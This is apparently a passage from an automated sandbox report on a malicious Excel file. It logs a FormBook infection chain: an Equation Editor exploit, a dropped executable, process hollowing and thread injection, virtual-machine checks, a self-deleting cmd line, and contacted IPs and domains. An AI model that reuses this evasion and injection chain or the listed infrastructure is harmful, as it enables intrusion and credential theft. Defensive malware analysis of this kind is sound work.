          Source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000006.00000000.2144980691.0000000003C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2347518295.0000000001FB0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/6@10/8
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Order List.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD355.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: Order List.xlsxReversingLabs: Detection: 31%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: RegAsm.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: RegAsm.exe, 00000005.00000003.2168886294.000000000049F000.00000004.00000001.sdmp
          Source: Order List.xlsxInitial sample: OLE indicators vbamacros = False
          Source: Order List.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417141 pushfd ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B375 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B3C2 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B3CB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00419BB1 push cs; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00406420 push ecx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041B42C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00419CAC push esp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00415D49 push 0000004Ah; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027ADFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0254DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E7141 pushfd ; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EB375 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EB3CB push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EB3C2 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EB42C push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000D6420 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E9BB1 push cs; iretd
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E9CAC push esp; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E5D49 push 0000004Ah; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85956112401
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85956112401
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Order List.xlsxStream path 'EncryptedPackage' entropy: 7.9982334381 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 00000000004085C4 second address: 00000000004085CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 000000000040894E second address: 0000000000408954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000D85C4 second address: 00000000000D85CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000D894E second address: 00000000000D8954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00408880 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2912Thread sleep time: -540000s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2912Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 268Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2236Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: explorer.exe, 00000006.00000002.2347303435.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2145523561.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.2145551150.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000006.00000000.2145458014.00000000041AD000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000002.2347347432.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00408880 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027A0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004C00AD mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004C00AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004C01CB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027900EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02790080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_027B26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_025526F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\rundll32.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 67.227.214.78 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.24.122.89 80
          Source: C:\Windows\explorer.exeNetwork Connect: 137.59.52.234 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.119.173.57 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.216 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1E0000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: explorer.exe, 00000006.00000000.2140225585.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2140225585.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.2347303435.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2140225585.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 321137 Sample: Order List.xlsx Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 39 www.tnicholson.design 2->39 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 Antivirus detection for URL or domain 2->61 63 12 other signatures 2->63 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 37 17 2->16         started        signatures3 process4 dnsIp5 47 198.23.212.188, 49165, 80 AS-COLOCROSSINGUS United States 11->47 33 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 81 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->81 18 vbc.exe 11->18         started        37 C:\Users\user\Desktop\~$Order List.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 49 Multi AV Scanner detection for dropped file 18->49 51 Machine Learning detection for dropped file 18->51 53 Writes to foreign memory regions 18->53 55 Maps a DLL or memory area into another process 18->55 21 RegAsm.exe 18->21         started        process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 21->65 67 Maps a DLL or memory area into another process 21->67 69 Sample uses process hollowing technique 21->69 71 2 other signatures 21->71 24 explorer.exe 21->24 injected process12 dnsIp13 41 www.the-trinity-project.com 185.119.173.57, 49171, 80 UKWEB-EQXGB United Kingdom 24->41 43 californiapropiedades.com 67.227.214.78, 49169, 80 LIQUIDWEBUS United States 24->43 45 13 other IPs or domains 24->45 73 System process connects to network (likely due to code injection or exploit) 24->73 28 rundll32.exe 24->28         started        signatures14 process15 signatures16 75 Modifies the context of a thread in another process (thread injection) 28->75 77 Maps a DLL or memory area into another process 28->77 79 Tries to detect virtualization through RDTSC time measurements 28->79 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Order List.xlsx31%ReversingLabsDocument-Word.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe27%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          C:\Users\Public\vbc.exe27%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.vbc.exe.49e0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.RegAsm.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          teelinkz.com1%VirustotalBrowse
          alloutdoorspeaker.com0%VirustotalBrowse
          www.pornfilm3d.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
